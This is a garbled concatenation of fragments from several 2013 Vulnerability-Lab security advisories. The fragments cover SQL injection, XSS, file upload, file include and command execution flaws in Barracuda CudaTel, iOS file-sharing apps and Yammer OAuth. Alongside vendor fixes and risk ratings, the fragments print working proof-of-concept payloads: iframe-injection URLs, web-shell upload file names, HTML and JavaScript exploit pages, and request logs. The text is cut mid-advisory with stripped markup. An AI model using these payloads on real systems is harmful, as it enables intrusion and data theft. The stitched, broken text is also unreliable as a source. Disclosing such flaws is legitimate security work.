face=Arial size=2 color=#006633EXAMPLE:/fontfont face=Arial size=2 color=#808080 HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]//font/b/p/div p align=leftinput type=submit value=Execute INPUT name=B1 /pp align=leftinput type=reset value=Clear ALL name=B2/p/formpbr iframe name=getting height=337 width=633 scrolling=yes frameborder=0/iframe/pdiv align=left p align=centerbfont face=Verdana size=2 color=#008000VULNERABILITY-LAB a href=mailto:resea...@vulnerability-lab.com; BKM/a/font/b/p/div/center/body/html 1.2 The client side input validation vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ... PoC: http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509since=1+daysearch_string=rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]page=1sortby=end_timestampsortorder=desc http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509since=1+daysearch_string=rows=100page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]sortby=end_timestampsortorder=desc Note: We only verified the bug with the same exception in a not parsed parameter but the bug itself is located in all areas of the invalid exception. Solution: = 1.1 To patch the sql injection it is required to parse the row and page parameters in the cdr module. 1.2 To fix the client side xss vulnerability parse by encoding the row parameter and restrict the input. Encode the affected exception-handling output listing when processing to display invalid input values. Note: Barracuda Networks provided an update of version 2.6.002.040 to v2.6.003.x to all clients and customers in the bn customer area. Risk: = 1.1 The security risk of the remote sql injection web vulnerability is estimated critical. 1.2 The security risk of the client side input validation web vulnerability is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability
Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities
in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Photo Server 2.0 iOS - Multiple Critical Vulnerabilities
exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. Vulnerable Module(s): [+] Upload (Files) Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] Index File Dir Listing Proof of Concept: = 1.1 The local command/path inject web vulnerability can be exploited by local attackers with device access and without user interaction. For demonstration or reproduce ... PoC: htmlhead meta http-equiv=content-type content=text/html; charset=UTF-8 titleiPad ¥337 360* [COMMAND/PATH INJECT VULNERABILITY] Photo Server app's Web Browser Interface Page/title/headbody centerh2iPad ¥337 360* [COMMAND/PATH INJECT VULNERABILITY]'s Photo Server App Web Browser Interface Page/h2/centerform action= method=post enctype=multipart/form-data name=form1 id=form1labelChoose QuickTime (.MOV) or JPEG (.JPG or .jpeg) file to upload to iPad ¥337 360* iframe src=a: input type=file name=file id=file value=Choose file... //labellabelinput type=submit name=button id=button value=Upload //label/formhrpiSave videos or photos of the links below to hard drive by using context menu's (mouse right-click) Save Link As ... function./ihrh1The Video and Photo List/h1 lia href='assets-library---asset/asset.PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22ext=PNG'img --- Request Session Log --- Status: 200[OK] GET http://192.168.2.104:/vulnerabilitylab Load Flags[LOAD_DOCUMENT_URI ] Content Size[3032] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer [http://192.168.2.104:/] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[3032] Date[So., 21 Jul 2013 10:13:51 GMT] 1.2 The file include web vulnerability can be exploited by remote attackers without application user account and user interaction. For demonstration or reproduce ... PoC: hrh1The Video and Photo List/h1 lia href=http://192.168.2.104:/assets-library---asset/../[File Include Vulnerability].PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22ext=PNGimg src=iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%2 0Web%20Browser%20Interface%20Page_files/../[File Include Vulnerability].PNGassets-library---asset/../[File Include Vulnerability].PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG/a 1.3 The arbitrary file upload vulnerability can by remote attackers without application user account and user interaction. For demonstration or reproduce ... PoC: hrh1The Video and Photo List/h1 lia href=http://192.168.2.104:/assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22ext=PNGimg src=iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%2 0Web%20Browser%20Interface%20Page_files/pentester23.PNG.jpg.html.php.js.gif.PNGassets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG/a Note: After the request of the upload you can attacker can open the localhost: webserver again and access the folder by an include of the filename Solution: = 1.1 The command/path injection web vulnerability can be patched by a secure parse or encoding of the 2 index location with the device name. 1.2 The file include web vulnerability can be patched by a secure parse of the POST method request when processing to upload a manipulated file. Encode, filter or parse also the output listing in the index with the existing file names. 1.3 Disallow multiple extensions by secure filtering of the POST method request when processing to upload a file with multiple extensions. Change the web app http server settings and file access rights to prevent the execution of js, html and php files. Risk: = 1.1 The security risk of the command/path inject web vulnerability is estimated as high. 1.2 The security risk of the file include web vulnerability is estimated as critical. 1.3 The security risk of the arbitrary file upload vulnerability is estimated as high(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability
!]/a.jpg id=img_PhotoSharp_Local_Photo_0 realurl= class=logoStart classname=logoStart/a span class=spanAlbum classname=spanAlbumDefault Album/span/div/tdtd class=photoTd classname=photoTd div id=PhotoSharp_Local_Document_0 class=watermarkStart classname=watermarkStart a href=javascript:loadDir('%2Fu%2FPhotoSharp_Local_Document%3FisSystem%3D0','PhotoSharp_Local_Document_0','%2Fu%2FPhotoSharp_Local_Document'); img src=iPic%20Sharp_files/PhotoSharp_Local_Document_75_75.jpg id=img_PhotoSharp_Local_Document_0 realurl= class=logoStart classname=logoStart/aspan class=spanAlbum classname=spanAlbum[PERSISTENT INJECTED SCRIPT CODE!]/span/div/td td class=photoTd classname=photoTd/tdtd class=photoTd classname=photoTd/tdtd class=photoTd classname=photoTd/td td class=photoTd classname=photoTd/tdtd class=photoTd classname=photoTd/tdtd class=photoTd classname=photoTd/td td class=photoTd classname=photoTd/td/tr Solution: = The vulnerability can be patched by a secure encoding of the foldername item input. Encode, Filter or parse also the affected output at the file dir index listing location when processing to display the item foldername. Risk: = The security risk of the persistent input validation web vulnerability is estimated as medium. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability
] Response Headers: Content-Length[20217] Server[MHttpServer/1.0.0] --- Exploitation Request Session Logs --- Reference(s): mHTTP Web-Server http://localhost:1861/ http://localhost:1861/mjs.js http://localhost:1861/aadd.htm http://localhost:1861/afgetthum.ma PoC Example: [HOST]:[PORT]/[FILE].[MA]?[PARAM Q]=%5C[PATH VAR]/[DIRECTION]%5C[ID]%5C[DOCUMNETS PATH]%5C[LIBRARY FOLDER]%5C[LOCAL PATH WDisk]%5C[COMMAND EXECUTION] PoC Link: http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION] PoC: Exploit 1 - HTML html headbodytitleWebDisk v3.0.2 - Command Execution Vulnerability - Remote PoC/title iframe src=http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA 56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION] width=800 height=800 /body/head html PoC: Exploit 2 - JS script language=JavaScriptm='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%3Ctitle%3EWebDisk%20v3.0.2%20-%20Command%20Execution%20Vulnerability%20 -%20Remote%20PoC%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A1861/afgetthum.ma%3Fp%3D%255Cvar%255Cmobile%255CApplications %255C8D137E49-3793-4C45-9A50-B8AF3AE7EA%0A56%255CDocuments%255CLibrary%255CWD%255C%5BCOMMAND%20EXECUTION%5D%20width%3D800%20height%3D800 %3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);/script Review Source: tdmid td colspan=3 height=1hr class=spline/td /tr tr td class=tdlefta href=img class=imgthum src=afico/files_txt.png/a/td td class=tdmid[CODE EXECUTION VULNERABILITY!]/td td class=tdright7-26 19:51br/br/a href=afdelete.ma?p=%5Cvar%5Cmobile%5CApplications %5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C%7C-%7C430429876.txtdelete/a/td /tr tr td colspan=3 height=1hr class=spline //td /tr Solution: = To fix the command execution parse the p variable and encode the input on direct GET requests. Parse and encode the output listing of the file input in the main file dir index module. Risk: = The security risk of the remote command execution web application vulnerability is estimated as critical. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Microsoft Yammer Social Network - oAuth Bypass (Session Token) Vulnerability
, HEAD, POST, PUT, DELETE, TRACE, CONNECT, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, VERSION-CONTROL, REPORT, CHECKOUT, CHECKIN, UNCHECKOUT, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE-CONTROL, MKACTIVITY, ORDERPATCH, ACL, SEARCH, PATCH Cache-Control: max-age=0, private, must-revalidate X-UA-Compatible: IE=Edge,chrome=1 Access-Control-Allow-Headers: Content-Type, X-Requested-With, NETWORK_ID, Authorization, X-CSRF-Token Access-Control-Allow-Origin: https://ymodules.yammer.com X-Runtime: 0.444532 X-Date: 1373316697937 Access-Control-Allow-Credentials: true X-XSS-Protection: 1; mode=block Content-Length: 70544 ?xml version=1.0 encoding=UTF-8? response meta current-user-id10490568/current-user-id direct-from-bodyfalse/direct-from-body followed-user-ids followed-user-id10638646/followed-user-id /followed-user-ids feed-nameCompany Feed/feed-name realtime channel-idMTozNTc3OTc6MzU3Nzk3/channel-id authentication-token9mP6fBnFfNlUvZGG0Bwt5nUPJBxmlRqoaG3bMiBsMqJ4nKtWKi1OLVKyMjQwsTQwNbPQUcpLLSnPL8pWsjI2NTe3NNdRSq0oyCyqBCoxNje1t DQ1sDSvBQCsgA8z/authentication-token urihttps://1-087.rt.yammer.com/cometd//uri /realtime feed-descjungletorch.com's public messages/feed-desc older-availabletrue/older-available followed-references followed-reference typeopen_graph_object/type id344060296338433/id /followed-reference /followed-references ymodules/ requested-poll-interval60/requested-poll-interval /meta references reference typethread/type web-urlhttps://www.yammer.com/jungletorch.com/#/Threads/show?threadId=289043199/web-url direct-messagefalse/direct-message Connection: keep-alive Solution: = TLS/SSL is the recommended approach to prevent any eavesdropping during the data exchange. Search Engine bots crawling should be restricted from capturing sensitive URL parameters from user sessions. Also user notifications should be enabled if an authentication request is being performed through the HTTPS protocol. Furthermore, Resource Providers can limit the likelihood of a replay attack from a tampered request by implementing protocol`s Nonce and Timestamp attributes. The value of oauth_nonce attribute is a randomly generated number to sign the Client request, and the oauth_timestamp defines the retention timeframe of the Nonce. Insecure Storage of Secrets: Protecting the integrity of the Client Credentials and Token Credentials works fairly well when it comes to storing them on servers. The secrets can be isolated and stored in a database or file-system with proper access control, file permission, physical security, and even database or disk encryption. For securing Client Credentials on mobile application clients, follow security best practices for storing sensitive, non-stale data such as application passwords and secrets. Risk: = The security risk of this insecure Oauth implementation vulnerability is estimated as critical. Credits: Vulnerability Laboratory [Research Team] - Ateeq Khan (at...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts